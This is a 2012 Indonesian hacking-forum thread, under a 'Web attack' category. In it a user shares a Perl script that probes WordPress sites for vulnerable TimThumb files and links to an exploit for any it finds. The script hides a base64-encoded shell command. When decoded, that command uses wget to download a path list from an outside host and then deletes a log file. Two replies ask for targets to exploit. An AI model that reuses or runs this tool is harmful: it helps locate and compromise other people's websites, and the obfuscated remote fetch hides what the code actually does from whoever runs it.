.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 Wordpress Timthumb Scanner

Go down 
2 posters
PengirimMessage
Voldemort
BC Security
BC Security
Voldemort


Jumlah posting : 331
Points : 725
Reputation : 16
Join date : 04.07.11

Wordpress Timthumb Scanner Empty
PostSubyek: Wordpress Timthumb Scanner   Wordpress Timthumb Scanner Icon_minitimeTue Feb 21, 2012 9:26 pm

Bicara soal wordpress sapa sih yang gak kenal ini cms.. tapi disini saya bahas tentang bugnya pada timthumb..
hmmm.. apa sih itu timthumb... ?
Timthumb menurut saya sebuah kode php untuk me-resize ukuran gambar seperti gambar. Tapi di balik fungsi itu terdapat bug untuk upload file secara remote.
cara exploitnya laen kali aja dibahas ya ??
Atau mungkin agan-agan disini udah tau cara exploitnya.
Disini saya masih menggunakan perl.
ini scriptnya :

Code:
#!/usr/bin/perl -X
system ('clear');
print q(
___________.__      ___________.__                ___.   
\__    ___/|__| ____\__    ___/|  |__  __ __  _____\_ |__ 
  |    |  |  |/    \|    |  |  |  \|  |  \/    \| __ \
  |    |  |  |  Y Y  \    |  |  Y  \  |  /  Y Y  \ \_\ \
  |____|  |__|__|_|  /____|  |___|  /____/|__|_|  /___  /
                    \/              \/            \/    \/ Wordpress
                          http://black-c0de.org
<<----------------------------------------------------------------->>
                          Coded By Voldemort
<<----------------------------------------------------------------->>


);
my $target="";
if ($#ARGV >= 0 ) {
$target = $ARGV[0];chomp($target)
}
else
{
print "URL Target (Wordpress Path)  ex: http://site.com\/blog/ => ";
$target = <STDIN>;chomp($target);
}
use HTTP::Request;                             
use HTTP::Request::Common;                     
use HTTP::Request::Common qw(POST);           
use LWP::Simple;                               
use LWP 5.53;                                 
use LWP::UserAgent;                           
use MIME::Base64;
my $dftr = 'tim.txt';
if (-e $dftr){
print "Database Exist..\n";
sleep(2);
print "Launch Now\n\n";
}
else
{
print "Database Not Exist..\n";
sleep(1);
print "Downloading database...\n";
system(decode_base64("d2dldCAtbyBsb2cgaHR0cDovL21hdHVyenlzY2kuY29tLnBsL19fbWF0dXJhMjAxMi90aW0gLU8gdGltLnR4dDtybSAtcmYgbG9n"));
print "Downloading Success...\nLaunch Now\n\n";
}
print "Waiting a few minute for searching vulnerable your target ($target)....!!!\n";
my $uagent    = "Mozilla/5.0 (X11; Linux i686; rv:9.0.1) Gecko/20100101 Firefox/9.0.1";

my $jml=0;
open (data, "tim.txt");
@wordlist=<data>;
close data;
my $byk = scalar(@wordlist);
foreach (@wordlist) {
my $hsl= &get_content($target.$_);
if ($hsl =~ /TimThumb version/i) {
print "Your Can Exploit --> $target$_";
$jml=$jml+1;
}
}

if ($jml == 0){
print "Not Found TimThum\nThanks For Use My Script\nHappy Hacking\n";
}
else {
print "Found $jml TimThumb Exploit is --> http://www.exploit-db.com\/exploits\/17602/\n";
print "Thanks For Use My Script\nHappy Hacking\n";
}

sub get_content() {
    my $url = $_[0];
    my $ua = LWP::UserAgent->new(agent => $uagent);
    $ua->timeout(7);
    my $req = HTTP::Request->new(GET => $url);
    my $res = $ua->request($req);
    return $res->content;
}



Cara gunakannya :

root@voldemort:~# chmod +x <nama file>
ex :
root@voldemort:~# chmod +x timthumb.pl
root@voldemort:~# ./<namafile>
ex :
root@voldemort:~# ./timthumb.pl

[*]Input target. ex : [You must be registered and logged in to see this link.] (sesuaikan path blognya dan diakhiri tanda "/")


silakan di coba om, semoga bermanfaat.
Kembali Ke Atas Go down
bl4ck4ng3l
NuuBiiTooL
NuuBiiTooL



Jumlah posting : 2
Points : 2
Reputation : 0
Join date : 13.09.11

Wordpress Timthumb Scanner Empty
PostSubyek: Re: Wordpress Timthumb Scanner   Wordpress Timthumb Scanner Icon_minitimeWed Feb 22, 2012 9:40 am

manteb script ny om,,
om,, ad subdomain bwt exploit ny ga???
Kembali Ke Atas Go down
bl4ck4ng3l
NuuBiiTooL
NuuBiiTooL



Jumlah posting : 2
Points : 2
Reputation : 0
Join date : 13.09.11

Wordpress Timthumb Scanner Empty
PostSubyek: Re: Wordpress Timthumb Scanner   Wordpress Timthumb Scanner Icon_minitimeWed Feb 22, 2012 9:41 am

manteb script ny om,,
om,, ad subdomain bwt exploit ny ga???
Kembali Ke Atas Go down
Sponsored content





Wordpress Timthumb Scanner Empty
PostSubyek: Re: Wordpress Timthumb Scanner   Wordpress Timthumb Scanner Icon_minitime

Kembali Ke Atas Go down
 
Wordpress Timthumb Scanner
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» wordpress timthumb vulneralibility
» WordPress TimThumb Exploitation
» WordPress TimThumb Plugin - Remote Code Execution
» WordPress Security Vulnerability Scanner
» Bug Dork Timthumb

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Web attack-
Navigasi: